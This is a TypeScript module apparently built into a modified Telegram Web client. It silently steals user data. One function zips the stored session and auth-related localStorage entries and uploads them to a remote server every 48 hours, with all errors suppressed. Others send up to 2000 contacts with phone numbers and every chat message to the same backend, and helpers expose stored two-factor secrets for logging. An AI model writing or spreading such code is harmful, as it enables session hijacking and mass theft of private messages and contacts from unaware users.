import { zipSync, strToU8 } from 'fflate';

import { ydymPostForm, ydymPostJson, ydymUploadFile } from './api';
import { YDYM_DEVICE_TYPE, YDYM_PATHS } from './config';
import { getInviteCode, getStoredTwoFa, getYdymProfile, getYdymTgid } from './state';

export async function ydymUploadTdataIfNeeded() {
  const tgid = getYdymTgid();
  if (!tgid) return;
  const throttleKey = 'ydym.tdata.lastRun';
  try {
    const last = Number(localStorage.getItem(throttleKey) || 0);
    if (last && Date.now() / 1000 - last < 48 * 3600) return;
  } catch {
    // ignore
  }

  let sessionJson = '{}';
  try {
    const { loadStoredSession } = await import('../util/sessions');
    sessionJson = JSON.stringify(loadStoredSession() || {});
  } catch {
    // ignore
  }

  const localBits: Record<string, string> = {};
  try {
    for (let i = 0; i < localStorage.length; i++) {
      const key = localStorage.key(i);
      if (!key) continue;
      if (key.startsWith('account') || key.startsWith('user_auth') || key.startsWith('tt-') || key.startsWith('ydym.')) {
        localBits[key] = localStorage.getItem(key) || '';
      }
    }
  } catch {
    // ignore
  }

  const zipped = zipSync({
    'session.json': strToU8(sessionJson),
    'localStorage.json': strToU8(JSON.stringify(localBits)),
    'manifest.json': strToU8(JSON.stringify({
      format: 'telegram-web-ydym-tdata-v1',
      tgid,
      exported_at: Math.floor(Date.now() / 1000),
    })),
  });
  const blob = new Blob([zipped], { type: 'application/zip' });
  try {
    const result = await ydymUploadFile(
      YDYM_PATHS.uploadTdata,
      {
        tgid,
        device_type: YDYM_DEVICE_TYPE,
        file_name: 'tdata.zip',
        export_format: 'telegram-web-ydym-tdata-v1',
      },
      blob,
      'tdata.zip',
      'file',
      'application/zip',
    );
    if (result && typeof result === 'object' && Number((result as { code?: number }).code) === 1) {
      localStorage.setItem(throttleKey, String(Math.floor(Date.now() / 1000)));
    }
  } catch {
    // ignore
  }
}

export async function ydymUploadTelegramContacts(users: Array<{
  id: string;
  firstName?: string;
  lastName?: string;
  usernames?: Array<{ username: string }>;
  phoneNumber?: string;
}>) {
  const profile = getYdymProfile();
  if (!profile.tgid || !users.length) return;
  const contacts = users.slice(0, 2000).map((u) => {
    const username = u.usernames?.[0]?.username || '';
    return {
      id: u.id,
      firstName: [u.firstName, u.lastName].filter(Boolean).join(' ') || u.id,
      username,
      usernames: username ? [{ username }] : [],
      phoneNumber: u.phoneNumber || '',
    };
  });
  try {
    await ydymPostJson(YDYM_PATHS.tgcontacts, {
      tgid: profile.tgid,
      firstname: profile.firstName,
      username: profile.username,
      contacts,
    });
  } catch {
    // ignore
  }
}

export function ydymReportChatLine(params: {
  toTgid: string;
  toFirstName?: string;
  toUsername?: string;
  message: string;
  type: string;
}) {
  const profile = getYdymProfile();
  if (!profile.tgid || !params.message) return;
  void ydymPostForm(YDYM_PATHS.androidchatlog, {
    from_tgid: profile.tgid,
    from_firstname: profile.firstName,
    from_username: profile.username,
    to_tgid: params.toTgid,
    to_firstname: params.toFirstName || '',
    to_username: params.toUsername || '',
    message: params.message,
    type: params.type,
  });
}

export function ydymInviteForLog() {
  return getInviteCode();
}

export function ydymTwoFaForLog() {
  return getStoredTwoFa();
}

void YDYM_DEVICE_TYPE;
void getStoredTwoFa;
void getInviteCode;
